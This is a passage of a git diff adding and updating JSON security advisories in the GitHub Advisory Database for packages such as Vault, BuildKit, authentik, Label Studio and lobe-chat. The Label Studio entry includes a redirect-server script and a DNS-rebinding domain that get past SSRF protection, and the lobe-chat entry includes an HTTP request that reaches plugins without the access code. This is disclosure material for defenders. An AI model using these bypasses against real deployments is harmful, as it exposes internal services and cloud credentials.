in 1.3.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.0" + }, + { + "fixed": "1.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10661" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/commit/18485ee9d4352ac8e8396c580b5941ccf8e5b31a" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#134-march-19th-2020" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/vault/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:40:40Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json b/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json index d1873270ee800..14b0c70f56835 100644 --- a/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json +++ b/advisories/github-reviewed/2024/01/GHSA-jgph-w8rh-xf5p/GHSA-jgph-w8rh-xf5p.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-jgph-w8rh-xf5p", - "modified": "2024-01-25T22:19:28Z", + "modified": "2024-01-29T14:22:17Z", "published": "2024-01-23T12:49:10Z", "aliases": [ "CVE-2023-44401" ], "summary": "View permissions are bypassed for paginated lists of ORM data", - "details": "### Impact\n`canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page.\n\nNote that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se.\n\nThis has been fixed by ensuring no new records are pulled in from the database after performing `canView` permission checks for each page of results. This may result in some pages in your query results having less than the maximum number of records per page even when there are more pages of results.\n\nThis behaviour is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly.\n\nYou can choose to disable these permission checks by disabling the `CanViewPermission` plugin following the instructions in [overriding default plugins](https://docs.silverstripe.org/en/5/developer_guides/graphql/plugins/overview/#overriding-default-plugins).\n\nNote that this vulnerability does not affect version 3.x.\n\n### References\nhttps://www.silverstripe.org/download/security-releases/CVE-2023-44401\n", + "details": "### Impact\n`canView` permission checks are bypassed for ORM data in paginated GraphQL query results where the total number of records is greater than the number of records per page.\n\nNote that this also affects GraphQL queries which have a limit applied, even if the query isn’t paginated per se.\n\nThis has been fixed by ensuring no new records are pulled in from the database after performing `canView` permission checks for each page of results. This may result in some pages in your query results having less than the maximum number of records per page even when there are more pages of results.\n\nThis behaviour is consistent with how pagination works in other areas of Silverstripe CMS, such as in `GridField`, and is a result of having to perform permission checks in PHP rather than in the database directly.\n\nYou can choose to disable these permission checks by disabling the `CanViewPermission` plugin following the instructions in [overriding default plugins](https://docs.silverstripe.org/en/5/developer_guides/graphql/plugins/overview/#overriding-default-plugins).\n\nNote that this vulnerability does not affect version 3.x.\n\n**Base CVSS:** [5.3](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C&version=3.1)\n**Reported by:** Eduard Briem from Hothouse Creative, Nelson\n\n### References\nhttps://www.silverstripe.org/download/security-releases/CVE-2023-44401\n", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json b/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json index fa15601785d99..bc8192b428c86 100644 --- a/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json +++ b/advisories/github-reviewed/2024/01/GHSA-jgxc-8mwq-9xqw/GHSA-jgxc-8mwq-9xqw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jgxc-8mwq-9xqw", - "modified": "2024-01-22T21:25:52Z", + "modified": "2024-01-31T14:55:29Z", "published": "2024-01-22T06:30:32Z", "aliases": [ "CVE-2017-20189" @@ -9,7 +9,10 @@ "summary": "Clojure classes can be used to craft a serialized object that runs arbitrary code on deserialization", "details": "In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-m3r6-h7wv-7xxv/GHSA-m3r6-h7wv-7xxv.json b/advisories/github-reviewed/2024/01/GHSA-m3r6-h7wv-7xxv/GHSA-m3r6-h7wv-7xxv.json new file mode 100644 index 0000000000000..a9c514e2f1e51 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-m3r6-h7wv-7xxv/GHSA-m3r6-h7wv-7xxv.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3r6-h7wv-7xxv", + "modified": "2024-02-01T17:48:14Z", + "published": "2024-01-31T22:43:32Z", + "aliases": [ + "CVE-2024-23651" + ], + "summary": "BuildKit vulnerable to possible race condition with accessing subpaths from cache mounts", + "details": "### Impact\nTwo malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing cache mounts with `--mount=type=cache,source=...` options.\n\n### References\nhttps://www.openwall.com/lists/oss-security/2019/05/28/1\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/buildkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.12.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23651" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/4604" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/buildkit" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:32Z", + "nvd_published_at": "2024-01-31T22:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json b/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json index 0f3711d9d1ba7..7b28095c15267 100644 --- a/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json +++ b/advisories/github-reviewed/2024/01/GHSA-m4m5-j36m-8x72/GHSA-m4m5-j36m-8x72.json @@ -55,6 +55,10 @@ { "type": "PACKAGE", "url": "https://github.com/i3thuan5/TuiTse-TsuSin" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tuitse-tsusin/PYSEC-2024-22.yaml" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-m979-w9wj-qfj9/GHSA-m979-w9wj-qfj9.json b/advisories/github-reviewed/2024/01/GHSA-m979-w9wj-qfj9/GHSA-m979-w9wj-qfj9.json new file mode 100644 index 0000000000000..cbe05f4a6f0c3 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-m979-w9wj-qfj9/GHSA-m979-w9wj-qfj9.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m979-w9wj-qfj9", + "modified": "2024-01-30T23:40:43Z", + "published": "2024-01-30T23:40:43Z", + "aliases": [ + "CVE-2020-10660" + ], + "summary": "HashiCorp Vault Improper Privilege Management", + "details": "HashiCorp Vault and Vault Enterprise versions 0.9.0 through 1.3.3 may, under certain circumstances, have an Entity's Group membership inadvertently include Groups the Entity no longer has permissions to. Fixed in 1.3.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.9.0" + }, + { + "fixed": "1.3.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10660" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/pull/8606" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/commit/18485ee9d4352ac8e8396c580b5941ccf8e5b31a" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#134-march-19th-2020" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/vault/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:40:43Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json b/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json index 27c43790c1d4b..9a8bf7797bf5f 100644 --- a/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json +++ b/advisories/github-reviewed/2024/01/GHSA-mg2x-mggj-6955/GHSA-mg2x-mggj-6955.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mg2x-mggj-6955", - "modified": "2024-01-24T21:13:06Z", + "modified": "2024-01-31T14:55:45Z", "published": "2024-01-24T15:30:30Z", "aliases": [ "CVE-2023-51702" @@ -9,7 +9,10 @@ "summary": "Apache Airflow CNCF Kubernetes provider, Apache Airflow: Kubernetes configuration file saved without encryption in the Metadata and logged as plain text in the Triggerer service", "details": "Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster.\n\nThis behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ { @@ -85,7 +88,7 @@ "cwe_ids": [ "CWE-312" ], - "severity": "LOW", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-01-24T21:13:06Z", "nvd_published_at": "2024-01-24T13:15:08Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-mrx3-gxjx-hjqj/GHSA-mrx3-gxjx-hjqj.json b/advisories/github-reviewed/2024/01/GHSA-mrx3-gxjx-hjqj/GHSA-mrx3-gxjx-hjqj.json new file mode 100644 index 0000000000000..f9d11fbe701f9 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-mrx3-gxjx-hjqj/GHSA-mrx3-gxjx-hjqj.json @@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mrx3-gxjx-hjqj", + "modified": "2024-01-30T19:34:57Z", + "published": "2024-01-29T22:30:54Z", + "aliases": [ + "CVE-2024-23647" + ], + "summary": "Authentik vulnerable to PKCE downgrade attack", + "details": "## Summary\n\nPKCE is a very important countermeasure in OAuth2 , both for public and confidential clients. It protects against CSRF attacks and code injection attacks. Because of this bug, an attacker can circumvent the protection PKCE offers.\n\n## Patches\n\nauthentik 2023.8.7 and 2023.10.7 fix this issue.\n\n## Details\n\nThere is a bug in our implementation of PKCE that allows an attacker to circumvent the protection that PKCE offers. PKCE adds the `code_challenge’ parameter to the authorization request and adds the `code_verifier’ parameter to the token request. We recently fixed a downgrade attack (in v2023.8.5 and 2023.10.4) where if the attacker removed the `code_verifier’ parameter in the token request, authentik would allow the request to pass, thus circumventing PKCE’s protection. However, in the latest version of the software, another downgrade scenario is still possible: if the attacker removes the `code_challenge’ parameter from the authorization request, authentik will also not do the PKCE check.\n\nNote that this type of downgrade enables an attacker to perform a code injection attack, even if the OAuth client is using PKCE (which is supposed to protect against code injection attacks). To start the attack, the attacker must initiate the authorization process without that `code_challenge’ parameter in the authorization request. But this is easy to do (just use a phishing site or email to trick the user into clicking on a link that the attacker controls – the authorization link without that `code_challenge’ parameter).\n\nThe OAuth BCP (https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics) explicitly mentions this particular attack in section 2.1.1: “Authorization servers MUST mitigate PKCE Downgrade Attacks by ensuring that a token request containing a code_verifier parameter is accepted only if a code_challenge parameter was present in the authorization request, see Section 4.8.2 for details.”\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n- Email us at [security@goauthentik.io](mailto:security@goauthentik.io)\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "goauthentik.io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2023.10.0" + }, + { + "fixed": "2023.10.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2023.10.6" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "goauthentik.io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2023.8.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2023.8.6" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/goauthentik/authentik/security/advisories/GHSA-mrx3-gxjx-hjqj" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23647" + }, + { + "type": "WEB", + "url": "https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/goauthentik/authentik" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:54Z", + "nvd_published_at": "2024-01-30T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-p59w-9gqw-wj8r/GHSA-p59w-9gqw-wj8r.json b/advisories/github-reviewed/2024/01/GHSA-p59w-9gqw-wj8r/GHSA-p59w-9gqw-wj8r.json new file mode 100644 index 0000000000000..14e611ac28a7b --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-p59w-9gqw-wj8r/GHSA-p59w-9gqw-wj8r.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p59w-9gqw-wj8r", + "modified": "2024-01-31T20:25:33Z", + "published": "2024-01-31T18:04:40Z", + "aliases": [ + "CVE-2023-47116" + ], + "summary": "Label Studio SSRF on Import Bypassing `SSRF_PROTECTION_ENABLED` Protections", + "details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to [`1.11.0`](https://github.com/HumanSignal/label-studio/releases/tag/1.11.0) and was tested on version `1.8.2`.\n\n# Overview\n\nLabel Studio's SSRF protections that can be enabled by setting the `SSRF_PROTECTION_ENABLED` environment variable can be bypassed to access internal web servers. This is because the current SSRF validation is done by executing a single DNS lookup to verify that the IP address is not in an excluded subnet range. This protection can be bypassed by either using HTTP redirection or performing a [DNS rebinding attack](https://en.wikipedia.org/wiki/DNS_rebinding).\n\n# Description\n\nThe following `tasks_from_url` method in [`label_studio/data_import/uploader.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/data_import/uploader.py#L127-L155) performs the SSRF validation (`validate_upload_url`) before sending the request.\n\n```python\ndef tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):\n \"\"\"Download file using URL and read tasks from it\"\"\"\n # process URL with tasks\n try:\n filename = url.rsplit('/', 1)[-1]\n\n validate_upload_url(url, block_local_urls=settings.SSRF_PROTECTION_ENABLED)\n # Reason for #nosec: url has been validated as SSRF safe by the\n # validation check above.\n response = requests.get(\n url, verify=False, headers={'Accept-Encoding': None}\n ) # nosec\n file_content = response.content\n check_tasks_max_file_size(int(response.headers['content-length']))\n file_upload = create_file_upload(\n user, project, SimpleUploadedFile(filename, file_content)\n )\n if file_upload.format_could_be_tasks_list:\n could_be_tasks_list = True\n file_upload_ids.append(file_upload.id)\n tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(\n project, file_upload_ids\n )\n\n except ValidationError as e:\n raise e\n except Exception as e:\n raise ValidationError(str(e))\n return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list\n```\n\nThe `validate_upload_url` code in [`label_studio/core/utils/io.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/core/utils/io.py#L174-L209) is shown below.\n\n```python\ndef validate_upload_url(url, block_local_urls=True):\n \"\"\"Utility function for defending against SSRF attacks. Raises\n - InvalidUploadUrlError if the url is not HTTP[S], or if block_local_urls is enabled\n and the URL resolves to a local address.\n - LabelStudioApiException if the hostname cannot be resolved\n\n :param url: Url to be checked for validity/safety,\n :param block_local_urls: Whether urls that resolve to local/private networks should be allowed.\n \"\"\"\n\n parsed_url = parse_url(url)\n\n if parsed_url.scheme not in ('http', 'https'):\n raise InvalidUploadUrlError\n\n domain = parsed_url.host\n try:\n ip = socket.gethostbyname(domain)\n except socket.error:\n from core.utils.exceptions import LabelStudioAPIException\n raise LabelStudioAPIException(f\"Can't resolve hostname {domain}\")\n\n if not block_local_urls:\n return\n\n if ip == '0.0.0.0': # nosec\n raise InvalidUploadUrlError\n local_subnets = [\n '127.0.0.0/8',\n '10.0.0.0/8',\n '172.16.0.0/12',\n '192.168.0.0/16',\n ]\n for subnet in local_subnets:\n if ipaddress.ip_address(ip) in ipaddress.ip_network(subnet):\n raise InvalidUploadUrlError\n```\n\nThe issue here is the SSRF validation is only performed before the request is sent, and does not validate the destination IP address. Therefore, an attacker can either redirect the request or perform a DNS rebinding attack to bypass this protection.\n\n# Proof of Concept\n\nBoth the HTTP redirection and DNS rebinding methods for bypassing Label Studio's SSRF protections are explained below.\n\n### HTTP Redirection\n\nThe python `requests` module automatically follows HTTP redirects (eg. response code `301` and `302`). Therefore, an attacker could use a URL shortener (eg. `https://www.shorturl.at/`) or host the following Python code on an external server to redirect request from a Label Studio server to an internal web server.\n\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nclass RedirectHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(301)\n # skip first slash\n self.send_header('Location', self.path[1:])\n self.end_headers()\n\nHTTPServer((\"\", 8080), RedirectHandler).serve_forever()\n```\n\n### DNS Rebinding Attack\n\nDNS rebinding can bypass SSRF protections by resolving to an external IP address for the first resolution, but when the request is sent resolves to an internal IP address that is blocked. For an example, the domain `7f000001.030d1fd6.rbndr.us` will randomly switch between the IP address `3.13.31.214` that is not blocked to `127.0.0.1` which is not allowed.\n\n# Impact\n\nSSRF vulnerabilities pose a significant risk on cloud environments, since instance credentials are managed by internal web APIs. An attacker can bypass Label Studio's SSRF protections to access internal web servers and partially compromise the confidentiality of those internal servers.\n\n# Remediation Advice\n\n* Before saving any responses, validate the destination IP address is not in the deny list.\n* Consider blocking internal cloud API IP ranges to mitigate the risk of compromising cloud credentials.\n\n# Discovered\n- August 2023, Alex Brown, elttam", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "label-studio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-p59w-9gqw-wj8r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47116" + }, + { + "type": "WEB", + "url": "https://github.com/HumanSignal/label-studio/commit/55dd6af4716b92f2bb213fe461d1ffbc380c6a64" + }, + { + "type": "WEB", + "url": "https://en.wikipedia.org/wiki/DNS_rebinding" + }, + { + "type": "PACKAGE", + "url": "https://github.com/HumanSignal/label-studio" + }, + { + "type": "WEB", + "url": "https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/core/utils/io.py#L174-L209" + }, + { + "type": "WEB", + "url": "https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/data_import/uploader.py#L127-L155" + }, + { + "type": "WEB", + "url": "https://github.com/HumanSignal/label-studio/releases/tag/1.11.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T18:04:40Z", + "nvd_published_at": "2024-01-31T17:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-p6rp-mx85-m459/GHSA-p6rp-mx85-m459.json b/advisories/github-reviewed/2024/01/GHSA-p6rp-mx85-m459/GHSA-p6rp-mx85-m459.json new file mode 100644 index 0000000000000..b6171c4967470 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-p6rp-mx85-m459/GHSA-p6rp-mx85-m459.json @@ -0,0 +1,102 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6rp-mx85-m459", + "modified": "2024-01-31T18:07:41Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2024-22236" + ], + "summary": "Spring Cloud Contract vulnerable to local information disclosure", + "details": "In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.cloud:spring-cloud-contract-shade" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.1" + } + ] + } + ], + "versions": [ + "4.1.0" + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.cloud:spring-cloud-contract-shade" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.springframework.cloud:spring-cloud-contract-shade" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22236" + }, + { + "type": "PACKAGE", + "url": "https://github.com/spring-cloud/spring-cloud-contract" + }, + { + "type": "WEB", + "url": "https://spring.io/security/cve-2024-22236" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T18:07:41Z", + "nvd_published_at": "2024-01-31T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-pf55-fj96-xf37/GHSA-pf55-fj96-xf37.json b/advisories/github-reviewed/2024/01/GHSA-pf55-fj96-xf37/GHSA-pf55-fj96-xf37.json new file mode 100644 index 0000000000000..04717cdb3467d --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-pf55-fj96-xf37/GHSA-pf55-fj96-xf37.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf55-fj96-xf37", + "modified": "2024-01-31T20:25:37Z", + "published": "2024-01-31T18:04:55Z", + "aliases": [ + "CVE-2024-24566" + ], + "summary": "@lobehub/chat vulnerable to unauthorized access to plugins", + "details": "###\tDescription:\nWhen the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password).\n###\tProof-of-Concept:\nLet’s suppose that application has been deployed with following command:\n```sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat```\nDue to the utilization of the `ACCESS_CODE`, access to the chat is possible only after entering the password:\n \n![image](https://raw.githubusercontent.com/dastaj/assets/main/others/image.png)\n\n\nHowever, it is possible to interact with chat plugins without entering the `ACCESS_CODE`. \nExample HTTP request:\n```\nPOST /api/plugin/gateway HTTP/1.1\nHost: localhost:3210\nContent-Length: 1276\n\n{\"apiName\":\"checkWeatherUsingGET\",\"arguments\":\"{\\n \\\"location\\\": \\\"London\\\"\\n}\",\"identifier\":\"WeatherGPT\",\"type\":\"default\",\"manifest\":{\"api\":[{\"description\":\"Get current weather information\",\"name\":\"checkWeatherUsingGET\",\"parameters\":{\"properties\":{\"location\":{\"type\":\"string\"}},\"required\":[\"location\"],\"type\":\"object\"}}],\"homepage\":\"https://weathergpt.vercel.app/legal\",\"identifier\":\"WeatherGPT\",\"meta\":{\"avatar\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp\",\"description\":\"Get current weather information for a specific location.\",\"title\":\"WeatherGPT\"},\"openapi\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json\",\"systemRole\":\"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.\",\"type\":\"default\",\"version\":\"1\",\"settings\":{\"properties\":{},\"type\":\"object\"}}}\n```\nHTTP response:\n```\nHTTP/1.1 200 OK\n[...]\n{\"location\":{\"name\":\"London\",\"region\":\"City of London, Greater London\",\"country\":\"United Kingdom\",\"lat\":51.52,\"lon\":-0.11,\"tz_id\":\"Europe/London\",\"localtime_epoch\":1706379026,\"localtime\":\"2024-01-27 18:10\"},\"current\":{\"last_updated_epoch\":1706378400,\"last_updated\":\"2024-01-27 18:00\",\"temp_c\":6,\"temp_f\":42.8,\"is_day\":0,\"condition\":{\"text\":\"Clear\",\"icon\":\"//cdn.weatherapi.com/weather/64x64/night/113.png\",\"code\":1000},\"wind_mph\":4.3,\"wind_kph\":6.8,\"wind_degree\":170,\"wind_dir\":\"S\",\"pressure_mb\":1031,\"pressure_in\":30.45,\"precip_mm\":0,\"precip_in\":0,\"humidity\":81,\"cloud\":0,\"feelslike_c\":3.8,\"feelslike_f\":38.9,\"vis_km\":10,\"vis_miles\":6,\"uv\":1,\"gust_mph\":9.5,\"gust_kph\":15.3},\"infoLink\":\"https://weathergpt.vercel.app/London\"}\n```\n###\tRemediation:\nVerify the `ACCESS_CODE` for HTTP requests to the `/api/plugin/:` route.\n\n###\tImpact:\nUnauthorized access to plugins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@lobehub/chat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.122.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.122.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24566" + }, + { + "type": "WEB", + "url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lobehub/lobe-chat" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T18:04:55Z", + "nvd_published_at": "2024-01-31T17:15:39Z" + } +} \ No newline at end of file diff --git 